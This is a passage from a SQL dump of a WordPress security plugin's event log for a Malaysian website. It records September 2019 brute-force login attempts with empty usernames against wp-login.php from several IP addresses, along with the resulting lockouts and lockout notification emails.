11:49:37',18088848,19288872,'https://bintara.com.my/2019/wp-login.php',1,0,'132.148.157.66'),(25771,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYOWXkXpgmG5P@iB8kdvAAAAIY\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.165.245\";s:11:\"REMOTE_PORT\";s:5:\"49524\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYOWXkXpgmG5P@iB8kdvAAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066585.9255\";s:12:\"REQUEST_TIME\";s:10:\"1569066585\";}}','notice','2019-09-21 11:49:47','2019-09-21 11:49:46',17798776,19288472,'https://bintara.com.my/test/wp-login.php',1,0,'50.63.165.245'),(25772,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:49:46\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:49:46\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:04:46\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:04:46\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:49:47','2019-09-21 11:49:46',17883400,19288472,'https://bintara.com.my/test/wp-login.php',1,0,'50.63.165.245'),(25773,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:49:47','2019-09-21 11:49:46',18089096,19288472,'https://bintara.com.my/test/wp-login.php',1,0,'50.63.165.245'),(25774,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYOfXkXpgmG5P@iB8kd6QAAAJE\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"157.245.5.62\";s:11:\"REMOTE_PORT\";s:5:\"47074\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYOfXkXpgmG5P@iB8kd6QAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066621.7966\";s:12:\"REQUEST_TIME\";s:10:\"1569066621\";}}','notice','2019-09-21 11:50:23','2019-09-21 11:50:22',17799088,19289784,'https://bintara.com.my/blog/wp-login.php',1,0,'157.245.5.62'),(25775,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:50:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:50:22\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:05:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:05:22\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:50:23','2019-09-21 11:50:22',17884024,19289784,'https://bintara.com.my/blog/wp-login.php',1,0,'157.245.5.62'),(25776,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:50:23','2019-09-21 11:50:22',18089752,19289784,'https://bintara.com.my/blog/wp-login.php',1,0,'157.245.5.62'),(25777,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYOr1iJ7D9Gn7wDPh8Z9AAAANg\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"167.114.18.68\";s:11:\"REMOTE_PORT\";s:5:\"52618\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYOr1iJ7D9Gn7wDPh8Z9AAAANg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066671.7502\";s:12:\"REQUEST_TIME\";s:10:\"1569066671\";}}','notice','2019-09-21 11:51:13','2019-09-21 11:51:12',17795432,19286208,'https://bintara.com.my/wordpress/wp-login.php',1,0,'167.114.18.68'),(25778,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:51:12\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:51:12\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:06:12\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:06:12\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:51:13','2019-09-21 11:51:12',17880264,19286208,'https://bintara.com.my/wordpress/wp-login.php',1,0,'167.114.18.68'),(25779,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:51:13','2019-09-21 11:51:12',18086120,19286208,'https://bintara.com.my/wordpress/wp-login.php',1,0,'167.114.18.68'),(25780,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYOzXkXpgmG5P@iB8keYAAAAIw\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"192.241.220.227\";s:11:\"REMOTE_PORT\";s:5:\"43234\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYOzXkXpgmG5P@iB8keYAAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066701.3248\";s:12:\"REQUEST_TIME\";s:10:\"1569066701\";}}','notice','2019-09-21 11:51:42','2019-09-21 11:51:41',17799160,19288864,'https://bintara.com.my/wp/wp-login.php',1,0,'192.241.220.227'),(25781,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:51:41\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:51:41\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:06:41\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:06:41\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:51:42','2019-09-21 11:51:41',17884032,19288864,'https://bintara.com.my/wp/wp-login.php',1,0,'192.241.220.227'),(25782,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:51:42','2019-09-21 11:51:41',18089784,19288864,'https://bintara.com.my/wp/wp-login.php',1,0,'192.241.220.227'),(25783,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYOz3kXpgmG5P@iB8keYwAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"167.99.226.184\";s:11:\"REMOTE_PORT\";s:5:\"35668\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYOz3kXpgmG5P@iB8keYwAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066703.2701\";s:12:\"REQUEST_TIME\";s:10:\"1569066703\";}}','notice','2019-09-21 11:51:44','2019-09-21 11:51:43',17796376,19287160,'https://bintara.com.my/test/wp-login.php',1,0,'167.99.226.184'),(25784,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:51:43\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:51:43\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:06:43\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:06:43\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:51:44','2019-09-21 11:51:43',17881272,19287160,'https://bintara.com.my/test/wp-login.php',1,0,'167.99.226.184'),(25785,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:51:44','2019-09-21 11:51:43',18087120,19287160,'https://bintara.com.my/test/wp-login.php',1,0,'167.99.226.184'),(25786,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYO1FiJ7D9Gn7wDPh8Z@QAAAM0\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"5.196.118.54\";s:11:\"REMOTE_PORT\";s:5:\"55437\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYO1FiJ7D9Gn7wDPh8Z@QAAAM0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066708.9391\";s:12:\"REQUEST_TIME\";s:10:\"1569066708\";}}','notice','2019-09-21 11:51:50','2019-09-21 